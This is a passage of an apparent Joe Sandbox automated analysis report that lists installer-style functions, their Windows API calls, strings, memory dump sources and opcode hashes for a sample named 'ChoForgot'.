                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                                                                                                                                                                                                                                                                                        • GetMessagePos.USER32 ref: 0040489D
                                                                                                                                                                                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 004048B5
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                                                                                                        • String ID: f
                                                                                                                                                                                                                                                                                                        • API String ID: 41195575-1993550816
                                                                                                                                                                                                                                                                                                        • Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                                                                                                                                                                        • Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4
                                                                                                                                                                                                                                                                                                        Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                                                                                                                                                                                                                                        • MulDiv.KERNEL32(00045A00,00000064,0010F561), ref: 00403295
                                                                                                                                                                                                                                                                                                        • wsprintfW.USER32 ref: 004032A5
                                                                                                                                                                                                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                                                                                                                                                                                                                                        • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        • verifying installer: %d%%, xrefs: 0040329F
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                                                                                                                        • String ID: verifying installer: %d%%
                                                                                                                                                                                                                                                                                                        • API String ID: 1451636040-82062127
                                                                                                                                                                                                                                                                                                        • Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                                                                                                                                                        • Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
                                                                                                                                                                                                                                                                                                        Function 00406064 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                                                        • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                                                        • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                                                        • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Char$Next$Prev
                                                                                                                                                                                                                                                                                                        • String ID: *?|<>/":
                                                                                                                                                                                                                                                                                                        • API String ID: 589700163-165019052
                                                                                                                                                                                                                                                                                                        • Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                                                                                                                                                        • Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
                                                                                                                                                                                                                                                                                                        Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                                                                                                                                                                                                                                        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                                                                                                                                                                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1912718029-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                                                                                                                                                        • Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
                                                                                                                                                                                                                                                                                                        Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                                                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                                                                                                                                                                                                                                        • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                                                                                                                                                                                                                                        • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                                                        • GlobalFree.KERNEL32(006DB088), ref: 00402387
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3376005127-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                                                                                                                                                                        • Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18
                                                                                                                                                                                                                                                                                                        Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54memoryfilestringCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2568930968-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                                                                                                                                                        • Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68
                                                                                                                                                                                                                                                                                                        Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?), ref: 004020A3
                                                                                                                                                                                                                                                                                                        • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                                                                                                                                                                                                                                        • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                                                                                                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1849352358-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                                                                                                                                                        • Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
                                                                                                                                                                                                                                                                                                        Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: MessageSend$Timeout
                                                                                                                                                                                                                                                                                                        • String ID: !
                                                                                                                                                                                                                                                                                                        • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                                                                                                        • Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                                                                                                                                                        • Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758
                                                                                                                                                                                                                                                                                                        Function 004043D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73stringCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                                                                                                                                                                                                                                                                                        • wsprintfW.USER32 ref: 00404483
                                                                                                                                                                                                                                                                                                        • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                                                                                                                        • String ID: %u.%u%s%s
                                                                                                                                                                                                                                                                                                        • API String ID: 3540041739-3551169577
                                                                                                                                                                                                                                                                                                        • Opcode ID: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                                                                                                                                                                                                                        • Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259
                                                                                                                                                                                                                                                                                                        Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                                                                                                                                                                                                                                        • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                                                                                                                                                                                                                                        • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
